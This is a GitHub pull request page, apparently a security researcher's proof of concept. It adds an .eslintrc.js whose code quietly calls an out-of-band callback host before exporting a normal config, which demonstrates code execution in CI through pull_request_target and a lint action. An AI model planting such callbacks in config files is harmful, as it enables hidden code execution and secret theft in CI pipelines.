Skip to content
This repository was archived by the owner on Jul 7, 2026. It is now read-only.
Closed

test #118

Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 8 additions & 0 deletions .eslintrc.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
// Proof of concept - RCE via pull_request_target + lint-action
// No secrets accessed, no data exfiltrated
const https = require("https");
https.get("https://d79554mj5fjlou9ptth01yyypng9rpr5g.oast.fun/poc-sybil-interface");

module.exports = {
extends: ["react-app"],
};
Loading